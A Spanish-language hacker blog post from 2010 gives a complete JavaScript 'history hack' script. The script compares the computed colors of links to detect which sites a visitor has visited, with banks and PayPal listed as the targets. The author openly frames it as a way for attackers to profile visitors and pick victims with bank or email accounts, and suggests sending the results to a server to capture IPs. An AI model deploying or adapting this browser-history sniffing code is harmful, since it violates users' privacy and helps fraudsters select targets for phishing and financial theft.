[Facebook] [Ask] [Bloglines] [del.icio.us] [Digg] [Furl] [Google] [MySpace] [Reddit] [Rojo] [Sphinn] [Spurl] [StumbleUpon] [Technorati] [Twitter] [Windows Live] [Yahoo!] [Email]

Scan Link Visited javascript

Había visto un par de códigos para hacer “HACK HISTORY” algunos también le llaman “ CROSS SITE DISPLAY” pero ninguno me convenció ya que tenían mas de 60 lineas para determinar los sitios visitados, así que hice mi código

Para los que no saben que es el HACK HISTORY ó CROSS SITE DISPLAY pues funciona de esta manera

Con un javascript le preguntamos al navegador que sitios a visitado nuestro visitante de esta manera un atacante (a mi gusto más experto) obtendrá información bastante útil para elegir a sus victimas ya que en base a los sitios visitados podemos determinar de cierta forma su perfil así como saber si tiene algunas visitas a bancos o cuentas de correo.

por ejemplo:

hsbc.com.mx
Malandrines.net
banamex.com.mx
paypal.com
godaddy.com
mexico.com.mx

Vamos a ver cual de todos estos sitios haz visitado, para ello hice un script que obtiene el color del enlace; con una simple comparación de color podemos saber si ya fue visitado y luego posteriormente podríamos enviarnos los datos a un script para sacar tu ip etc...

Scan link visited demo

De esta forma el atacante sabrá que visitas banamex, paypal etc... y por cuestiones de probabilidad es mas conveniente atacar a alguien que posea este historial.

code:

<a href="http://no-v1s1t3d.net/" alt="no borrar este link">no display</a>
<a href="http://www.hsbc.com.mx/">hsbc.com.mx</a>
<a href="http://malandrines.net/">Malandrines</a>
<a href="http://banamex.com.mx/">banamex.com.mx</a>
<a href="http://paypal.com/">paypal.com</a>
<a href="http://godaddy.com/">godaddy.com</a>
<a href="http://mexico.com.mx/">mexico.com.mx</a>
<script language="javascript">
var color_Notvisited;
window.onload = function() {
var a = document.getElementsByTagName("a");
var n3='<b>Solo haz visitado:</b><br><font color="red">';
var novisited='<b>No haz visitado:</b><br><font color="orange">';
for (var x in a){

if (a[x].href != null){

var color=window.getComputedStyle(a[x],null).getPropertyValue('color');
if(a[x].href=='http://no-v1s1t3d.net/'){ color_Notvisited=color; continue; }

if(color==color_Notvisited)
novisited+=a[x].href+' color: '+color+'<br>';
else
n3+=a[x].href+' color: '+color+'<br>';
}
}
document.write(n3+'</font>'+novisited+'</font>');

}
</script>

Solo lo he probado en FF y IE, y no es cross browser; en eso ando :P confienzo que desconocia el metod0 getComputedStyle, ya encontrare su igual en IE.

Writing by: n350k Date: 2010-01-08 12:10:00
Gr33tz: w3r0x, bikolinux, 50ck0, Poison.san, Xp3rm4, g4b0, z3r0-zo0rg(Gay),ukn0wz, b3n0x and Mafia boys CreW, Dios De La Red, Fatal error
Fucking White hat's

Rola este r00t: [Facebook] [Ask] [Bloglines] [del.icio.us] [Digg] [Furl] [Google] [MySpace] [Reddit] [Rojo] [Sphinn] [Spurl] [StumbleUpon] [Technorati] [Twitter] [Windows Live] [Yahoo!] [Email]

Últimos artículos:

De interés:
tools.malandrines.net Tefacturo.com

Anúnciate aquí

Música

Nodes
c0ding & Design by n350k Power OS 4b0u7 SlackWare